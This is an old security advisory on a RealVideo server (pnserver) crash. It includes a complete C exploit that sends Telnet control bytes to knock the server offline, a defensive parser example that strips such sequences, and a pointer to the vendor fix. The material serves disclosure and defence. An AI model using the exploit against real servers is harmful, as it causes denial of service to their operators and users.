COMMAND
pnserver
SYSTEMS AFFECTED
4.0.0.0-rvserver-build-68, Solaris 2.x, Revision: 1.91.2.4
5.0-rvserver-build-261, NT 3.5.x, Revision: 1.94.2.175
5.0-rvserver-build-262, Linux 1.2.x, Revision: 1.94.2.176
PROBLEM
Flooding the server with pages of garbage was not the true
problem. When the telnet client's buffer filled, the client sent 6
control characters, and those characters crash the server once its
own maximum buffer size is reached.
s0niC found the following. He crashed a RealAudio server by
connecting to it via telnet, pasting about 30 lines to the server,
then quitting the telnet session.
Here is a working exploit that sends the control sequence directly.
/*
 * pnserver exploit [1/15/98]
 *
 * Crashes Progressive Networks Real Video Server [ http://www.real.com/ ]
 *
 * Rootshell [ http://www.rootshell.com/ ]
 *
 * Compiled under linux.
 *
 */
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *hp;
    char buffer[6];     /* five control bytes plus the terminating NUL */
    int sock;

    if (argc != 3) {
        printf("usage: %s <rvserver_host> <port>\n\nNote: Try port 7070.\n\n", argv[0]);
        exit(1);
    }
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("Unknown host: %s\n", argv[1]);
        exit(1);
    }
    bzero((char *) &sin, sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(atoi(argv[2]));

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("socket");
        exit(1);
    }
    if (connect(sock, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
        perror("connect");
        exit(1);
    }
    /* The telnet control sequence described above:
     * IAC IP (255 244) followed by IAC DO TIMING-MARK (255 253 6). */
    sprintf(buffer, "%c%c%c%c%c", 255, 244, 255, 253, 6);
    write(sock, &buffer[0], strlen(buffer));
    close(sock);
    return 0;
}
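The bytes the exploit writes are the Telnet control sequence IAC IP (255 244) followed by IAC DO TIMING-MARK (255 253 6), which a telnet client emits when the user interrupts it. The underlying defect is a server that does not tolerate unexpected control bytes in its input stream. The C program below is an added example, not code from the advisory or from RealNetworks: a bounded parser that separates Telnet command sequences from data so that a line-oriented server can drop or log them instead of mis-handling them. The function name strip_telnet_iac, the iac_stats structure and the sample bytes are all constructed for this illustration.

```c
/* Added example: bounded handling of Telnet IAC command sequences in a
 * byte stream.  Not part of the advisory or of any RealNetworks code. */
#include <stddef.h>
#include <stdio.h>

#define IAC  255   /* interpret as command */
#define DONT 254
#define DO   253
#define WONT 252
#define WILL 251
#define SB   250   /* subnegotiation begin */
#define SE   240   /* subnegotiation end */

/* Outcome of one parse: data bytes kept, command sequences seen, and
 * whether the input ended in the middle of a sequence. */
struct iac_stats {
    size_t data_len;
    size_t commands;
    size_t truncated;
};

/* Copy the data bytes of `in` into `out`, skipping Telnet command
 * sequences.  Every index is checked against `n` before it is read, and
 * every write is checked against `outcap`, so malformed or truncated
 * input can only shorten the result, never overrun a buffer. */
struct iac_stats strip_telnet_iac(const unsigned char *in, size_t n,
                                  unsigned char *out, size_t outcap)
{
    struct iac_stats st = {0, 0, 0};
    size_t i = 0;

    while (i < n) {
        unsigned char c = in[i];

        if (c != IAC) {                    /* ordinary data byte */
            if (st.data_len < outcap)
                out[st.data_len++] = c;
            i++;
            continue;
        }
        if (i + 1 >= n) {                  /* lone IAC at end of input */
            st.truncated = 1;
            break;
        }
        unsigned char cmd = in[i + 1];

        if (cmd == IAC) {                  /* IAC IAC = escaped 0xFF data byte */
            if (st.data_len < outcap)
                out[st.data_len++] = IAC;
            i += 2;
        } else if (cmd == DO || cmd == DONT || cmd == WILL || cmd == WONT) {
            if (i + 2 >= n) {              /* IAC <cmd> <option> needs 3 bytes */
                st.truncated = 1;
                break;
            }
            st.commands++;
            i += 3;
        } else if (cmd == SB) {            /* skip to IAC SE, bounded by n */
            size_t j = i + 2;
            while (j + 1 < n && !(in[j] == IAC && in[j + 1] == SE))
                j++;
            if (j + 1 >= n) {
                st.truncated = 1;
                break;
            }
            st.commands++;
            i = j + 2;
        } else {                           /* two-byte command, e.g. IP (244) */
            st.commands++;
            i += 2;
        }
    }
    return st;
}

/* Constructed sample: the exploit's five bytes followed by a normal line. */
static const unsigned char sample[] = {
    255, 244, 255, 253, 6, 'G', 'E', 'T', ' ', '/', '\r', '\n'
};

/* Small wrappers exposing results as plain return values. */
size_t sample_commands(void)
{
    unsigned char o[64];
    return strip_telnet_iac(sample, sizeof sample, o, sizeof o).commands;
}
size_t sample_data_len(void)
{
    unsigned char o[64];
    return strip_telnet_iac(sample, sizeof sample, o, sizeof o).data_len;
}
size_t truncated_iac_flag(void)
{
    static const unsigned char t[] = {'x', 255, 253};   /* cut-off IAC DO */
    unsigned char o[4];
    return strip_telnet_iac(t, sizeof t, o, sizeof o).truncated;
}
size_t escaped_iac_data_len(void)
{
    static const unsigned char t[] = {255, 255};        /* one literal 0xFF */
    unsigned char o[4];
    return strip_telnet_iac(t, sizeof t, o, sizeof o).data_len;
}

int main(void)
{
    unsigned char out[64];
    struct iac_stats st = strip_telnet_iac(sample, sizeof sample, out, sizeof out);
    printf("data bytes=%zu commands=%zu truncated=%zu\n",
           st.data_len, st.commands, st.truncated);
    fwrite(out, 1, st.data_len, stdout);
    return 0;
}
```

On the sample input the parser reports two command sequences and seven data bytes, and the truncated flag lets the caller decide whether to wait for more input or close the connection. The command count per connection is also a cheap detection signal: a client speaking the server's own protocol has no reason to send Telnet negotiation, so a non-zero count is worth logging.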
SOLUTION
A fix for this denial of service attack is now available at:
http://service.real.com/help/faq/serv501.html
It is recommended that RealServer 4.0 and 5.0 users on Windows NT
and UNIX platforms update their RealServers. This issue does not
affect 3.0 or earlier servers.